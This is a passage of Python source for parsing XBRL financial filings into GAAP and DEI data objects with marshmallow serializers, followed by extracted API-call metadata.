gaap_data["income_loss"] = \
XBRL.data_processing(income_loss, ignore_errors, logger)
net_income_shareholders = \
xbrl.find_all(name=re.compile("(us-gaap:netincomeavailabletocommon\
stockholdersbasic)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_shareholders"] = \
XBRL.data_processing(net_income_shareholders, ignore_errors, logger)
preferred_stock_dividends = \
xbrl.find_all(name=re.compile("(us-gaap:preferredstockdividendsand\
otheradjustments)", re.IGNORECASE | re.MULTILINE))
gaap_data["preferred_stock_dividends"] = \
XBRL.data_processing(preferred_stock_dividends, ignore_errors, logger)
net_income_loss_noncontrolling = \
xbrl.find_all(name=re.compile("(us-gaap:netincomelossattributableto\
noncontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_loss_noncontrolling"] = \
XBRL.data_processing(net_income_loss_noncontrolling, ignore_errors, logger)
net_income_loss = \
xbrl.find_all(name=re.compile("^us-gaap:netincomeloss$",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_loss"] = \
XBRL.data_processing(net_income_loss, ignore_errors, logger)
other_comprehensive_income = \
xbrl.find_all(name=re.compile("(us-gaap:othercomprehensiveincomeloss\
netoftax)", re.IGNORECASE | re.MULTILINE))
gaap_data["other_comprehensive_income"] = \
XBRL.data_processing(other_comprehensive_income, ignore_errors, logger)
comprehensive_income = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income"] = \
XBRL.data_processing(comprehensive_income, ignore_errors, logger)
comprehensive_income_parent = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincomenetof"
"tax)", re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income_parent"] = \
XBRL.data_processing(comprehensive_income_parent, ignore_errors, logger)
comprehensive_income_interest = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincomenetoftax\
attributabletononcontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income_interest"] = \
XBRL.data_processing(comprehensive_income_interest, ignore_errors, logger)
# Cash flow statements #
net_cash_flows_operating = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
operatingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_operating"] = \
XBRL.data_processing(net_cash_flows_operating, ignore_errors, logger)
net_cash_flows_investing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
investingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing"] = \
XBRL.data_processing(net_cash_flows_investing, ignore_errors, logger)
net_cash_flows_financing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
financingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_financing"] = \
XBRL.data_processing(net_cash_flows_financing, ignore_errors, logger)
net_cash_flows_operating_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
operatingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_operating_continuing"] = \
XBRL.data_processing(net_cash_flows_operating_continuing, ignore_errors, logger)
net_cash_flows_investing_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
investingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing_continuing"] = \
XBRL.data_processing(net_cash_flows_investing_continuing, ignore_errors, logger)
net_cash_flows_financing_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
financingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_financing_continuing"] = \
XBRL.data_processing(net_cash_flows_financing_continuing, ignore_errors, logger)
net_cash_flows_operating_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:cashprovidedbyusedin\
operatingactivitiesdiscontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_operating_discontinued"] = \
XBRL.data_processing(net_cash_flows_operating_discontinued, ignore_errors, logger)
net_cash_flows_investing_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:cashprovidedbyusedin\
investingactivitiesdiscontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing_discontinued"] = \
XBRL.data_processing(net_cash_flows_investing_discontinued, ignore_errors, logger)
net_cash_flows_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
discontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_discontinued"] = \
XBRL.data_processing(net_cash_flows_discontinued, ignore_errors, logger)
common_shares_outstanding = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
outstanding)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_outstanding"] = \
XBRL.data_processing(common_shares_outstanding, ignore_errors, logger)
common_shares_issued = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
issued)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_issued"] = \
XBRL.data_processing(common_shares_issued, ignore_errors, logger)
common_shares_authorized = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
authorized)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_authorized"] = \
XBRL.data_processing(common_shares_authorized, ignore_errors, logger)
return gaap_data
@staticmethod
def parse_DEI(xbrl,
ignore_errors,
logger):
"""
Parse DEI from our XBRL soup and return a DEI object.
"""
dei_obj = DEI()
trading_symbol = xbrl.find_all(name=re.compile("(dei:tradingsymbol)",
re.IGNORECASE | re.MULTILINE))
dei_obj.trading_symbol = \
XBRL.data_processing(trading_symbol,
ignore_errors, logger,
options={'type': 'String',
'no_context': True})
company_name = xbrl.find_all(name=re.compile("(dei:entityregistrantname)",
re.IGNORECASE | re.MULTILINE))
dei_obj.company_name = \
XBRL.data_processing(company_name,
ignore_errors, logger,
options={'type': 'String',
'no_context': True})
shares_outstanding = xbrl.find_all(name=re.compile("(dei:entitycommonstocksharesoutstanding)",
re.IGNORECASE | re.MULTILINE))
dei_obj.shares_outstanding = \
XBRL.data_processing(shares_outstanding,
ignore_errors, logger,
options={'type': 'Number',
'no_context': True})
public_float = xbrl.find_all(name=re.compile("(dei:entitypublicfloat)",
re.IGNORECASE | re.MULTILINE))
dei_obj.public_float = \
XBRL.data_processing(public_float,
ignore_errors, logger,
options={'type': 'Number',
'no_context': True})
return dei_obj
@staticmethod
def parse_custom(xbrl,
ignore_errors,
logger):
"""
Parse company custom entities from XBRL and return an Custom object.
"""
custom_obj = Custom()
custom_data = xbrl.find_all(re.compile('^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\s*',
re.IGNORECASE | re.MULTILINE))
elements = {}
for data in custom_data:
if XBRL.is_number(data.text):
setattr(custom_obj, data.name.split(':')[1], data.text)
return custom_obj
@staticmethod
def is_number(s):
"""
Test if value is numeric
"""
try:
s = float(s)
return True
except ValueError:
return False
@staticmethod
def data_processing(elements,
ignore_errors,
logger,
**kwargs):
"""
Process a XBRL tag object and extract the correct value as
stated by the context.
"""
options = kwargs.get('options', {'type': 'Number',
'no_context': False})
if options['type'] == 'String':
if len(elements) > 0:
return elements[0].text
if options['no_context'] == True:
if len(elements) > 0 and XBRL.is_number(elements[0].text):
return elements[0].text
data = {}
for element in elements:
try:
ctx = element.attrs['contextref']
if XBRL.is_number(element.text):
attr_precision = 0
decimals = element.attrs['decimals']
if decimals is not None:
attr_precision = int(decimals)
val = float(element.text) if attr_precision > 0 else int(element.text)
data[ctx] = val
except Exception as e:
if ignore_errors == 0:
raise XBRLException('value extraction error')
elif ignore_errors == 2:
logger.error(str(e) + " error at " +
''.join(element.text))
return data
# Preprocessing to fix broken XML
# TODO - Run tests to see if other XML processing errors can occur
class XBRLPreprocessedFile(XBRLFile):
def __init__(self, fh):
super(XBRLPreprocessedFile, self).__init__(fh)
if self.fh is None:
return
xbrl_string = self.fh.read()
# find all closing tags as hints
closing_tags = [t.upper() for t in re.findall(r'(?i)</([a-z0-9_\.]+)>',
xbrl_string)]
# close all tags that don't have closing tags and
# leave all other data intact
last_open_tag = None
tokens = re.split(r'(?i)(</?[a-z0-9_\.]+>)', xbrl_string)
new_fh = StringIO()
for idx, token in enumerate(tokens):
is_closing_tag = token.startswith('</')
is_processing_tag = token.startswith('<?')
is_cdata = token.startswith('<!')
is_tag = token.startswith('<') and not is_cdata
is_open_tag = is_tag and not is_closing_tag \
and not is_processing_tag
if is_tag:
if last_open_tag is not None:
new_fh.write("</%s>" % last_open_tag)
last_open_tag = None
if is_open_tag:
tag_name = re.findall(r'(?i)<*>', token)[0]
if tag_name.upper() not in closing_tags:
last_open_tag = tag_name
new_fh.write(token)
new_fh.seek(0)
self.fh = new_fh
# Base GAAP object
@dataclass
class GAAP:
assets : float = 0.0
current_assets : float = 0.0
non_current_assets : float = 0.0
liabilities_and_equity : float = 0.0
liabilities : float = 0.0
current_liabilities : float = 0.0
noncurrent_liabilities : float = 0.0
commitments_and_contingencies : float = 0.0
redeemable_noncontrolling_interest : float = 0.0
temporary_equity : float = 0.0
equity : float = 0.0
equity_attributable_interest : float = 0.0
equity_attributable_parent : float = 0.0
stockholders_equity : float = 0.0
revenues : float = 0.0
cost_of_revenue : float = 0.0
gross_profit : float = 0.0
costs_and_expenses : float = 0.0
other_operating_income : float = 0.0
operating_income_loss : float = 0.0
nonoperating_income_loss : float = 0.0
interest_and_debt_expense : float = 0.0
income_before_equity_investments : float = 0.0
income_from_equity_investments : float = 0.0
income_tax_expense_benefit : float = 0.0
extraordary_items_gain_loss : float = 0.0
income_loss : float = 0.0
net_income_shareholders : float = 0.0
preferred_stock_dividends : float = 0.0
net_income_loss_noncontrolling : float = 0.0
net_income_parent : float = 0.0
net_income_loss : float = 0.0
other_comprehensive_income : float = 0.0
comprehensive_income : float = 0.0
comprehensive_income_parent : float = 0.0
comprehensive_income_interest : float = 0.0
net_cash_flows_operating : float = 0.0
net_cash_flows_investing : float = 0.0
net_cash_flows_financing : float = 0.0
net_cash_flows_operating_continuing : float = 0.0
net_cash_flows_investing_continuing : float = 0.0
net_cash_flows_financing_continuing : float = 0.0
net_cash_flows_operating_discontinued : float = 0.0
net_cash_flows_investing_discontinued : float = 0.0
net_cash_flows_discontinued : float = 0.0
common_shares_outstanding : float = 0.0
common_shares_issued : float = 0.0
common_shares_authorized : float = 0.0
class GAAPSerializer(Schema):
assets = fields.Number()
current_assets = fields.Number()
non_current_assets = fields.Number()
liabilities_and_equity = fields.Number()
liabilities = fields.Number()
current_liabilities = fields.Number()
noncurrent_liabilities = fields.Number()
commitments_and_contingencies = fields.Number()
redeemable_noncontrolling_interest = fields.Number()
temporary_equity = fields.Number()
equity = fields.Number()
equity_attributable_interest = fields.Number()
equity_attributable_parent = fields.Number()
stockholders_equity = fields.Number()
revenues = fields.Number()
cost_of_revenue = fields.Number()
gross_profit = fields.Number()
operating_expenses = fields.Number()
costs_and_expenses = fields.Number()
other_operating_income = fields.Number()
operating_income_loss = fields.Number()
nonoperating_income_loss = fields.Number()
interest_and_debt_expense = fields.Number()
income_before_equity_investments = fields.Number()
income_from_equity_investments = fields.Number()
income_tax_expense_benefit = fields.Number()
extraordary_items_gain_loss = fields.Number()
income_loss = fields.Number()
net_income_shareholders = fields.Number()
preferred_stock_dividends = fields.Number()
net_income_loss_noncontrolling = fields.Number()
net_income_parent = fields.Number()
net_income_loss = fields.Number()
other_comprehensive_income = fields.Number()
comprehensive_income = fields.Number()
comprehensive_income_parent = fields.Number()
comprehensive_income_interest = fields.Number()
net_cash_flows_operating = fields.Number()
net_cash_flows_investing = fields.Number()
net_cash_flows_financing = fields.Number()
net_cash_flows_operating_continuing = fields.Number()
net_cash_flows_investing_continuing = fields.Number()
net_cash_flows_financing_continuing = fields.Number()
net_cash_flows_operating_discontinued = fields.Number()
net_cash_flows_investing_discontinued = fields.Number()
net_cash_flows_discontinued = fields.Number()
common_shares_outstanding = fields.Number()
common_shares_issued = fields.Number()
common_shares_authorized = fields.Number()
# Base DEI object
@dataclass
class DEI:
trading_symbol : str = ''
company_name : str = ''
shares_outstanding : float = 0.0
public_float: float = 0.0
class DEISerializer(Schema):
trading_symbol = fields.String()
company_name = fields.String()
shares_outstanding = fields.Number()
public_float = fields.Number()
# Base Custom object
class Custom:
def __init__(self):
return None
def __call__(self):
return self.__dict__.items()
|
[
"io.StringIO",
"re.split",
"logging.basicConfig",
"BeautifulSoup.BeautifulStoneSoup",
"datetime.date.today",
"bs4.BeautifulSoup",
"datetime.datetime.strptime",
"re.findall",
"datetime.timedelta",
"marshmallow.fields.String",
"marshmallow.fields.Number",
"collections.OrderedDict",
"logging.getLogger",
"re.compile"
] |
[((33597, 33612), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33610, 33612), False, 'from marshmallow import Schema, fields\n'), ((33634, 33649), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33647, 33649), False, 'from marshmallow import Schema, fields\n'), ((33675, 33690), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33688, 33690), False, 'from marshmallow import Schema, fields\n'), ((33720, 33735), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33733, 33735), False, 'from marshmallow import Schema, fields\n'), ((33754, 33769), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33767, 33769), False, 'from marshmallow import Schema, fields\n'), ((33796, 33811), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33809, 33811), False, 'from marshmallow import Schema, fields\n'), ((33841, 33856), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33854, 33856), False, 'from marshmallow import Schema, fields\n'), ((33893, 33908), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33906, 33908), False, 'from marshmallow import Schema, fields\n'), ((33950, 33965), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33963, 33965), False, 'from marshmallow import Schema, fields\n'), ((33989, 34004), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34002, 34004), False, 'from marshmallow import Schema, fields\n'), ((34018, 34033), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34031, 34033), False, 'from marshmallow import Schema, fields\n'), ((34069, 34084), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34082, 34084), False, 'from marshmallow import Schema, fields\n'), ((34118, 34133), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34131, 34133), False, 'from marshmallow import Schema, fields\n'), ((34160, 34175), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34173, 34175), False, 'from marshmallow import Schema, fields\n'), ((34191, 34206), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34204, 34206), False, 'from marshmallow import Schema, fields\n'), ((34229, 34244), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34242, 34244), False, 'from marshmallow import Schema, fields\n'), ((34264, 34279), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34277, 34279), False, 'from marshmallow import Schema, fields\n'), ((34305, 34320), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34318, 34320), False, 'from marshmallow import Schema, fields\n'), ((34346, 34361), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34359, 34361), False, 'from marshmallow import Schema, fields\n'), ((34391, 34406), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34404, 34406), False, 'from marshmallow import Schema, fields\n'), ((34435, 34450), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34448, 34450), False, 'from marshmallow import Schema, fields\n'), ((34482, 34497), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34495, 34497), False, 'from marshmallow import Schema, fields\n'), ((34530, 34545), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34543, 34545), False, 'from marshmallow import Schema, fields\n'), ((34585, 34600), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34598, 34600), False, 'from marshmallow import Schema, fields\n'), ((34638, 34653), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34651, 34653), False, 'from marshmallow import Schema, fields\n'), ((34687, 34702), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34700, 34702), False, 'from marshmallow import Schema, fields\n'), ((34737, 34752), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34750, 34752), False, 'from marshmallow import Schema, fields\n'), ((34771, 34786), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34784, 34786), False, 'from marshmallow import Schema, fields\n'), ((34817, 34832), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34830, 34832), False, 'from marshmallow import Schema, fields\n'), ((34865, 34880), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34878, 34880), False, 'from marshmallow import Schema, fields\n'), ((34918, 34933), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34931, 34933), False, 'from marshmallow import Schema, fields\n'), ((34958, 34973), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34971, 34973), False, 'from marshmallow import Schema, fields\n'), ((34996, 35011), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35009, 35011), False, 'from marshmallow import Schema, fields\n'), ((35045, 35060), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35058, 35060), False, 'from marshmallow import Schema, fields\n'), ((35088, 35103), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35101, 35103), False, 'from marshmallow import Schema, fields\n'), ((35138, 35153), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35151, 35153), False, 'from marshmallow import Schema, fields\n'), ((35190, 35205), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35203, 35205), False, 'from marshmallow import Schema, fields\n'), ((35237, 35252), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35250, 35252), False, 'from marshmallow import Schema, fields\n'), ((35284, 35299), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35297, 35299), False, 'from marshmallow import Schema, fields\n'), ((35331, 35346), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35344, 35346), False, 'from marshmallow import Schema, fields\n'), ((35389, 35404), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35402, 35404), False, 'from marshmallow import Schema, fields\n'), ((35447, 35462), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35460, 35462), False, 'from marshmallow import Schema, fields\n'), ((35505, 35520), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35518, 35520), False, 'from marshmallow import Schema, fields\n'), ((35565, 35580), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35578, 35580), False, 'from marshmallow import Schema, fields\n'), ((35625, 35640), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35638, 35640), False, 'from marshmallow import Schema, fields\n'), ((35675, 35690), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35688, 35690), False, 'from marshmallow import Schema, fields\n'), ((35723, 35738), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35736, 35738), False, 'from marshmallow import Schema, fields\n'), ((35766, 35781), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35779, 35781), False, 'from marshmallow import Schema, fields\n'), ((35813, 35828), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35826, 35828), False, 'from marshmallow import Schema, fields\n'), ((36048, 36063), 'marshmallow.fields.String', 'fields.String', ([], {}), '()\n', (36061, 36063), False, 'from marshmallow import Schema, fields\n'), ((36083, 36098), 'marshmallow.fields.String', 'fields.String', ([], {}), '()\n', (36096, 36098), False, 'from marshmallow import Schema, fields\n'), ((36124, 36139), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (36137, 36139), False, 'from marshmallow import Schema, fields\n'), ((36159, 36174), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (36172, 36174), False, 'from marshmallow import Schema, fields\n'), ((354, 379), 'bs4.BeautifulSoup', 'BeautifulSoup', (['fh', '"""lxml"""'], {}), "(fh, 'lxml')\n", (367, 379), False, 'from bs4 import BeautifulSoup\n'), ((741, 754), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (752, 754), False, 'from collections import OrderedDict\n'), ((2917, 2945), 're.compile', 're.compile', (['"""[0-9]{4}Q[1-4]"""'], {}), "('[0-9]{4}Q[1-4]')\n", (2927, 2945), False, 'import re\n'), ((3392, 3414), 're.compile', 're.compile', (['"""[0-9]{4}"""'], {}), "('[0-9]{4}')\n", (3402, 3414), False, 'import re\n'), ((30623, 30671), 're.split', 're.split', (['"""(?i)(</?[a-z0-9_\\\\.]+>)"""', 'xbrl_string'], {}), "('(?i)(</?[a-z0-9_\\\\.]+>)', xbrl_string)\n", (30631, 30671), False, 'import re\n'), ((30689, 30699), 'io.StringIO', 'StringIO', ([], {}), '()\n', (30697, 30699), False, 'from io import StringIO\n'), ((548, 570), 'BeautifulSoup.BeautifulStoneSoup', 'BeautifulStoneSoup', (['fh'], {}), '(fh)\n', (566, 570), False, 'from BeautifulSoup import BeautifulStoneSoup\n'), ((1105, 1126), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1124, 1126), False, 'import datetime\n'), ((1335, 1362), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(90)'}), '(days=90)\n', (1353, 1362), False, 'import datetime\n'), ((3898, 4026), 'logging.basicConfig', 'logging.basicConfig', ([], {'filename': '"""/tmp/xbrl.log"""', 'level': 'logging.ERROR', 'format': '"""%(asctime)s %(levelname)s %(name)s %(message)s"""'}), "(filename='/tmp/xbrl.log', level=logging.ERROR, format=\n '%(asctime)s %(levelname)s %(name)s %(message)s')\n", (3917, 4026), False, 'import logging\n'), ((4075, 4102), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4092, 4102), False, 'import logging\n'), ((28015, 28104), 're.compile', 're.compile', (['"""^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\\\\s*"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\\\\s*', re.IGNORECASE | re.\n MULTILINE)\n", (28025, 28104), False, 'import re\n'), ((1190, 1236), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['end_date', '"""%Y%m%d"""'], {}), "(end_date, '%Y%m%d')\n", (1216, 1236), False, 'import datetime\n'), ((1418, 1446), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(360)'}), '(days=360)\n', (1436, 1446), False, 'import datetime\n'), ((4906, 4927), 're.compile', 're.compile', (['"""xbrl*:*"""'], {}), "('xbrl*:*')\n", (4916, 4927), False, 'import re\n'), ((5694, 5756), 're.compile', 're.compile', (["(doc_root + 'context')", '(re.IGNORECASE | re.MULTILINE)'], {}), "(doc_root + 'context', re.IGNORECASE | re.MULTILINE)\n", (5704, 5756), False, 'import re\n'), ((8983, 9060), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(assetsnoncurrent)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(assetsnoncurrent)', re.IGNORECASE | re.MULTILINE)\n", (8993, 9060), False, 'import re\n'), ((9532, 9607), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(liabilitiesand)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(liabilitiesand)', re.IGNORECASE | re.MULTILINE)\n", (9542, 9607), False, 'import re\n'), ((9819, 9891), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(liabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(liabilities)', re.IGNORECASE | re.MULTILINE)\n", (9829, 9891), False, 'import re\n'), ((10089, 10198), 're.compile', 're.compile', (['"""(us-gaap:)[^s] *(currentliabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s] *(currentliabilities)',\n re.IGNORECASE | re.MULTILINE)\n", (10099, 10198), False, 'import re\n'), ((10413, 10525), 're.compile', 're.compile', (['"""(us-gaap:)[^s] *(noncurrentliabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s] *(noncurrentliabilities)',\n re.IGNORECASE | re.MULTILINE)\n", (10423, 10525), False, 'import re\n'), ((10753, 10864), 're.compile', 're.compile', (['"""(us-gaap:commitments andcontingencies)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commitments andcontingencies)',\n re.IGNORECASE | re.MULTILINE)\n", (10763, 10864), False, 'import re\n'), ((11111, 11239), 're.compile', 're.compile', (['"""(us-gaap:redeemablenoncontrolling interestequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:redeemablenoncontrolling interestequity)'\n , re.IGNORECASE | re.MULTILINE)\n", (11121, 11239), False, 'import re\n'), ((11446, 11522), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(temporaryequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(temporaryequity)', re.IGNORECASE | re.MULTILINE)\n", (11456, 11522), False, 'import re\n'), ((11703, 11770), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(equity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(equity)', re.IGNORECASE | re.MULTILINE)\n", (11713, 11770), False, 'import re\n'), ((11958, 12028), 're.compile', 're.compile', (['"""(us-gaap:minorityinterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:minorityinterest)', re.IGNORECASE | re.MULTILINE)\n", (11968, 12028), False, 'import re\n'), ((12129, 12270), 're.compile', 're.compile', (['"""(us-gaap:partnerscapitalattributable tononcontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:partnerscapitalattributable tononcontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (12139, 12270), False, 'import re\n'), ((12501, 12614), 're.compile', 're.compile', (['"""(us-gaap:liabilitiesandpartners capital)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:liabilitiesandpartners capital)',\n re.IGNORECASE | re.MULTILINE)\n", (12511, 12614), False, 'import re\n'), ((12703, 12775), 're.compile', 're.compile', (['"""(us-gaap:stockholdersequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:stockholdersequity)', re.IGNORECASE | re.MULTILINE)\n", (12713, 12775), False, 'import re\n'), ((13120, 13189), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(revenues)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(revenues)', re.IGNORECASE | re.MULTILINE)\n", (13130, 13189), False, 'import re\n'), ((13370, 13437), 're.compile', 're.compile', (['"""(us-gaap:costofrevenue)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofrevenue)', re.IGNORECASE | re.MULTILINE)\n", (13380, 13437), False, 'import re\n'), ((13525, 13593), 're.compile', 're.compile', (['"""(us-gaap:costofservices)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofservices)', re.IGNORECASE | re.MULTILINE)\n", (13535, 13593), False, 'import re\n'), ((13681, 13750), 're.compile', 're.compile', (['"""(us-gaap:costofgoodssold)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofgoodssold)', re.IGNORECASE | re.MULTILINE)\n", (13691, 13750), False, 'import re\n'), ((13838, 13948), 're.compile', 're.compile', (['"""(us-gaap:costofgoodsand servicessold)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofgoodsand servicessold)',\n re.IGNORECASE | re.MULTILINE)\n", (13848, 13948), False, 'import re\n'), ((14145, 14217), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(grossprofit)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(grossprofit)', re.IGNORECASE | re.MULTILINE)\n", (14155, 14217), False, 'import re\n'), ((14416, 14494), 're.compile', 're.compile', (['"""(us-gaap:operating)[^s]*(expenses)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:operating)[^s]*(expenses)', re.IGNORECASE | re.MULTILINE)\n", (14426, 14494), False, 'import re\n'), ((14705, 14782), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(costsandexpenses)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(costsandexpenses)', re.IGNORECASE | re.MULTILINE)\n", (14715, 14782), False, 'import re\n'), ((14997, 15071), 're.compile', 're.compile', (['"""(us-gaap:otheroperatingincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:otheroperatingincome)', re.IGNORECASE | re.MULTILINE)\n", (15007, 15071), False, 'import re\n'), ((15293, 15367), 're.compile', 're.compile', (['"""(us-gaap:otheroperatingincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:otheroperatingincome)', re.IGNORECASE | re.MULTILINE)\n", (15303, 15367), False, 'import re\n'), ((15590, 15666), 're.compile', 're.compile', (['"""(us-gaap:nonoperatingincomeloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:nonoperatingincomeloss)', re.IGNORECASE | re.MULTILINE)\n", (15600, 15666), False, 'import re\n'), ((15896, 15972), 're.compile', 're.compile', (['"""(us-gaap:interestanddebtexpense)"""', 